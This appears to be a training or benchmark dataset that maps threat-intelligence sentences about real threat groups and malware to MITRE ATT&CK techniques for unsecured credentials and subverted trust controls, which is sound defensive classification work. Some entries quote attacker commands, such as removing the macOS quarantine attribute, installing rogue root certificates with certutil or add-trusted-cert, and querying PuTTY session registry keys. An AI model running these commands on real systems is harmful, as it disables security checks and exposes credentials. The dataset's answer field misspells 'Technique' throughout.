+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has run a tool that steals passwords saved in victim email.,"Tecnique: T1552.001 Unsecured Credentials: Credentials In Files, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used credential dumping tools such as LaZagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access.,"Tecnique: T1552.001 Unsecured Credentials: Credentials In Files, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Scattered Spider Spider searches for credential storage documentation on a compromised host.,"Tecnique: T1552.001 Unsecured Credentials: Credentials In Files, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has used malware to gather credentials from FTP clients and Outlook.,"Tecnique: T1552.001 Unsecured Credentials: Credentials In Files, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has searched for unsecured AWS credentials and Docker API credentials.,"Tecnique: T1552.001 Unsecured Credentials: Credentials In Files, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AADInternals can gather unsecured credentials for Azure AD services, such as Azure AD Connect, from a local machine.","Tecnique: T1552.001 Unsecured Credentials: Credentials In Files, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla has the ability to extract credentials from configuration or support files.,"Tecnique: T1552.001 Unsecured Credentials: Credentials In Files, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Azorult can steal credentials in files belonging to common software such as Skype, Telegram, and Steam.","Tecnique: T1552.001 Unsecured Credentials: Credentials In Files, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackEnergy has used a plug-in to gather credentials stored in files on the host by various software programs, including The Bat! email client, Outlook, and Windows Credential Store.","Tecnique: T1552.001 Unsecured Credentials: Credentials In Files, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has been observed leveraging a module that retrieves passwords stored on a system for the current logged-on user.,"Tecnique: T1552.001 Unsecured Credentials: Credentials In Files, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can use various modules to search for files containing passwords.,"Tecnique: T1552.001 Unsecured Credentials: Credentials In Files, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hildegard has searched for SSH keys, Docker credentials, and Kubernetes service tokens.","Tecnique: T1552.001 Unsecured Credentials: Credentials In Files, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LaZagne can obtain credentials from chats, databases, mail, and WiFi.","Tecnique: T1552.001 Unsecured Credentials: Credentials In Files, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 contains modules for searching for passwords in local and remote files.,"Tecnique: T1552.001 Unsecured Credentials: Credentials In Files, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy can use Lazagne for harvesting credentials.,"Tecnique: T1552.001 Unsecured Credentials: Credentials In Files, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pysa has extracted credentials from the password database before encrypting the files.,"Tecnique: T1552.001 Unsecured Credentials: Credentials In Files, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuasarRAT can obtain passwords from FTP clients.,"Tecnique: T1552.001 Unsecured Credentials: Credentials In Files, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Smoke Loader searches for files named logins.json to parse for credentials.,"Tecnique: T1552.001 Unsecured Credentials: Credentials In Files, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot can obtain passwords stored in files from several applications such as Outlook, Filezilla, OpenSSH, OpenVPN and WinSCP. Additionally, it searches for the "".vnc.lnk"" affix to steal VNC credentials.","Tecnique: T1552.001 Unsecured Credentials: Credentials In Files, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XTunnel is capable of accessing locally stored passwords on victims.,"Tecnique: T1552.001 Unsecured Credentials: Credentials In Files, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: jRAT can capture passwords from common chat applications such as MSN Messenger, AOL, Instant Messenger, and and Google Talk.","Tecnique: T1552.001 Unsecured Credentials: Credentials In Files, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: If an initial connectivity check fails, pngdowner attempts to extract proxy details and credentials from Windows Protected Storage and from the IE Credentials Store. This allows the adversary to use the proxy credentials for subsequent requests if they enable outbound HTTP access.","Tecnique: T1552.001 Unsecured Credentials: Credentials In Files, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 used Outlook Credential Dumper to harvest credentials stored in Windows registry.,"Tecnique: T1552.002 Unsecured Credentials: Credentials in Registry, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla has the ability to extract credentials from the Registry.,"Tecnique: T1552.002 Unsecured Credentials: Credentials in Registry, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IceApple can harvest credentials from local and remote host registries.,"Tecnique: T1552.002 Unsecured Credentials: Credentials in Registry, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerSploit has several modules that search the Windows Registry for stored credentials: Get-UnattendedInstallFile, Get-Webconfig, Get-ApplicationHost, Get-SiteListPassword, Get-CachedGPPPassword, and Get-RegistryAutoLogon.","Tecnique: T1552.002 Unsecured Credentials: Credentials in Registry, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Reg may be used to find credentials in the Windows Registry.,"Tecnique: T1552.002 Unsecured Credentials: Credentials in Registry, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot has retrieved PuTTY credentials by querying the Software\SimonTatham\Putty\Sessions registry key,"Tecnique: T1552.002 Unsecured Credentials: Credentials in Registry, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak can use the clientgrabber module to steal e-mail credentials from the Registry.,"Tecnique: T1552.002 Unsecured Credentials: Credentials in Registry, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kinsing has searched bash_history for credentials.,"Tecnique: T1552.003 Unsecured Credentials: Bash History, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors used Mimikatz to dump certificates and private keys from the Windows certificate store.","Tecnique: T1552.004 Unsecured Credentials: Private Keys, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 obtained PKI keys, certificate files, and the private encryption key from an Active Directory Federation Services (AD FS) container to decrypt corresponding SAML signing certificates.","Tecnique: T1552.004 Unsecured Credentials: Private Keys, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke has used SSH private keys on the infected machine to spread its coinminer throughout a network.,"Tecnique: T1552.004 Unsecured Credentials: Private Keys, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Scattered Spider enumerate and exfiltrate code-signing certificates from a compromised host.,"Tecnique: T1552.004 Unsecured Credentials: Private Keys, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has searched for unsecured SSH keys.,"Tecnique: T1552.004 Unsecured Credentials: Private Keys, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AADInternals can gather encryption keys from Azure AD services such as ADSync and Active Directory Federated Services servers.,"Tecnique: T1552.004 Unsecured Credentials: Private Keys, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ebury has intercepted unencrypted private keys as well as private key pass-phrases.,"Tecnique: T1552.004 Unsecured Credentials: Private Keys, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can use modules like Invoke-SessionGopher to extract private key and session information.,"Tecnique: T1552.004 Unsecured Credentials: Private Keys, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FoggyWeb can retrieve token signing certificates and token decryption certificates from a compromised AD FS server.,"Tecnique: T1552.004 Unsecured Credentials: Private Keys, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hildegard has searched for private keys in .ssh.,"Tecnique: T1552.004 Unsecured Credentials: Private Keys, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kinsing has searched for private keys.,"Tecnique: T1552.004 Unsecured Credentials: Private Keys, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete has scanned and looked for cryptographic keys and certificate file extensions.,"Tecnique: T1552.004 Unsecured Credentials: Private Keys, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can collect a Chrome encryption key used to protect browser cookies.,"Tecnique: T1552.004 Unsecured Credentials: Private Keys, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mimikatz's CRYPTO::Extract module can extract keys by interacting with Windows cryptographic application programming interface (API) functions.,"Tecnique: T1552.004 Unsecured Credentials: Private Keys, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: jRAT can steal keys for VPNs and cryptocurrency wallets.,"Tecnique: T1552.004 Unsecured Credentials: Private Keys, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has queried the AWS instance metadata service for credentials.,"Tecnique: T1552.005 Unsecured Credentials: Cloud Instance Metadata API, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hildegard has queried the Cloud Instance Metadata API for cloud credentials.,"Tecnique: T1552.005 Unsecured Credentials: Cloud Instance Metadata API, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Peirates can query the query AWS and GCP metadata APIs for secrets.,"Tecnique: T1552.005 Unsecured Credentials: Cloud Instance Metadata API, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has used a variety of publicly available tools like Gpppassword to gather credentials.,"Tecnique: T1552.006 Unsecured Credentials: Group Policy Preferences, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used PowerShell cmdlets `Get-GPPPassword` and `Find-GPOPassword` to find unsecured credentials in a compromised network group policy.,"Tecnique: T1552.006 Unsecured Credentials: Group Policy Preferences, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerSploit contains a collection of Exfiltration modules that can harvest credentials from Group Policy Preferences.,"Tecnique: T1552.006 Unsecured Credentials: Group Policy Preferences, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY has a module that can extract cached GPP passwords.,"Tecnique: T1552.006 Unsecured Credentials: Group Policy Preferences, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Peirates can query the Kubernetes API for secrets.,"Tecnique: T1552.007 Unsecured Credentials: Container API, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has targeted various collaboration tools like Slack, Teams, JIRA, Confluence, and others to hunt for exposed credentials to support privilege escalation and lateral movement.","Tecnique: T1552.008 Unsecured Credentials: Chat Messages, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Axiom has used digital certificates to deliver malware.,"Tecnique: T1553 Subvert Trust Controls, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CoinTicker downloads the EggShell mach-o binary using curl, which does not set the quarantine flag.","Tecnique: T1553.001 Subvert Trust Controls: Gatekeeper Bypass, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacMa has removed the `com.apple.quarantineattribute` from the dropped file, `$TMPDIR/airportpaird`.","Tecnique: T1553.001 Subvert Trust Controls: Gatekeeper Bypass, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: If running with elevated privileges, OSX/Shlayer has used the spctl command to disable Gatekeeper protection for a downloaded file. OSX/Shlayer can also leverage system links pointing to bash scripts in the downloaded DMG file to bypass Gatekeeper, a flaw patched in macOS 11.3 and later versions. OSX/Shlayer has been Notarized by Apple, resulting in successful passing of additional Gatekeeper checks.","Tecnique: T1553.001 Subvert Trust Controls: Gatekeeper Bypass, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX_OCEANLOTUS.D uses the command xattr -d com.apple.quarantine to remove the quarantine file attribute used by Gatekeeper.,"Tecnique: T1553.001 Subvert Trust Controls: Gatekeeper Bypass, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XCSSET has dropped a malicious applet into an app's `.../Contents/MacOS/` folder of a previously launched app to bypass Gatekeeper's security checks on first launch apps (prior to macOS 13).,"Tecnique: T1553.001 Subvert Trust Controls: Gatekeeper Bypass, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For C0015, the threat actors used DLL files that had invalid certificates.","Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group digitally signed their own malware to evade detection.","Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Honeybee, the threat actors deployed the MaoCheng dropper with a stolen Adobe Systems digital signature.","Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 was able to get SUNBURST signed by SolarWinds code signing certificates by injecting the malware into the SolarWinds Orion software lifecycle.","Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 leveraged code-signing certificates to sign malware when targeting both gaming and non-gaming organizations.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CopyKittens digitally signed an executable with a stolen certificate from legitimate company AI Squared.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Darkhotel has used code-signing certificates on its malware that are either forged due to weak keys or stolen. Darkhotel has also stolen certificates and signed backdoors and downloaders with them.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ember Bear has used stolen certificates from Electrum Technologies GmbH to sign payloads.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has used Comodo code-signing certificates.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has signed Carbanak payloads with legally purchased code signing certificates. FIN7 has also digitally signed their phishing documents, backdoors and other staging tools to bypass security controls.","Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM has used stolen certificates to sign its tools including those from Whizzimo LLC.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has signed files with the name EGIS CO,. Ltd..","Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has digitally signed malware and utilities to evade detection.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has used stolen code signing certificates to sign malware.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LuminousMoth has signed their malware with a valid digital signature.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Molerats has used forged Microsoft code-signing certificates on malware.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Moses Staff has used signed drivers from an open source tool called DiskCryptor to evade detection.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PROMETHIUM has signed code with self-signed certificates.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork has signed malware with self-signed certificates from fictitious and spoofed legitimate software companies.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Scattered Spider has used self-signed and stolen certificates originally issued to NVIDIA and Global Software LLC.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silence has used a valid certificate to sign their primary loader Silence.Downloader (aka TrueBot).,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Suckfly has used stolen certificates to sign its malware.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has signed payloads with code signing certificates from Thawte and Sectigo.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Winnti Group used stolen certificates to sign its malware.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used Digicert code-signing certificates for some of its malware.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has resized and added data to the certificate table to enable the signing of modified files with legitimate signatures.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Anchor has been signed with valid certificates to evade detection by security tools.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleJeus has used a valid digital signature from Sectigo to appear legitimate.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLINDINGCAN has been signed with code-signing certificates such as CodeRipper.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BOOSTWRITE has been signed by a valid CA.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackConfig has been signed with self signed digital certificates mimicking a legitimate software company.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bandook was signed with valid Certum certificates.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar has been signed with fake certificates including those appearing to be from VB CORPORATE PTY. LTD.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Black Basta dropper has been digitally signed with a certificate issued by Akeo Consulting for legitimate executables used for creating bootable USB drives.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CSPY Downloader has come signed with revoked certificates.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ChChes samples were digitally signed with a certificate originally used by Hacking Team that was later leaked and subsequently revoked.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clop can use code signing to evade detection.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can use self signed Java applets to execute signed applet attacks.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some Daserf samples were signed with a stolen digital certificate.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ebury has installed a self-signed RPM package mimicking the original system package on RPM based systems.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ecipekac has used a valid, legitimate digital signature to evade detection.","Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has used valid digital certificates from Sysprint AG to sign its Epic dropper.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gazer versions are signed with various valid certificates; one was likely faked and issued by Comodo for ""Solid Loop Ltd,"" and another was issued for ""Ultimate Computer Support Ltd.""","Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GreyEnergy digitally signs the malware with a code-signing certificate.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Helminth samples have been signed with legitimate, compromised code signing certificates owned by software company AI Squared.","Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The HermeticWiper executable has been signed with a legitimate certificate issued to Hermetica Digital Ltd.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWizard has been signed by valid certificates assigned to Hermetica Digital.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Janicab used a valid AppleDeveloperID to sign the code to get past security restrictions.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LockerGoga has been signed with stolen certificates in order to make it look more legitimate.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has digitally signed executables using AVAST Software certificates.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: More_eggs has used a signed binary shellcode loader and a signed Dynamic Link Library (DLL) to create a reverse shell.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nerex drops a signed Microsoft DLL to disk.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PipeMon, its installer, and tools are signed with stolen code-signing certificates.","Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can use signed loaders to evade detection.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A QuasarRAT .dll file is digitally signed by a certificate from AirVPN.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM samples have been signed with a code-signing certificates.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST was digitally signed by SolarWinds from March - May 2020.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SpicyOmelette has been signed with valid digital certificates.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrongPity has been signed with self-signed certificates.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet used a digitally signed driver with a compromised Realtek certificate.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SysUpdate has been signed with stolen digital certificates.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot has come with a signed downloader component.,"Tecnique: T1553.002 Subvert Trust Controls: Code Signing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dok installs a root certificate to aid in Adversary-in-the-Middle actions using the command add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /tmp/filename.,"Tecnique: T1553.004 Subvert Trust Controls: Install Root Certificate, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hikit installs a self-generated certificate to the local trust store as a root CA and Trusted Publisher.,"Tecnique: T1553.004 Subvert Trust Controls: Install Root Certificate, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM can add a certificate to the Windows store.,"Tecnique: T1553.004 Subvert Trust Controls: Install Root Certificate, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: certutil can be used to install browser root certificates as a precursor to performing Adversary-in-the-Middle between connections to banking websites. Example command: certutil -addstore -f -user ROOT ProgramData\cert512121.der.,"Tecnique: T1553.004 Subvert Trust Controls: Install Root Certificate, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has embedded ISO images and VHDX files in HTML to evade Mark-of-the-Web.,"Tecnique: T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has used .iso files to deploy malicious .lnk files.,"Tecnique: T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass, Tactic: TA0005 Defense Evasion"
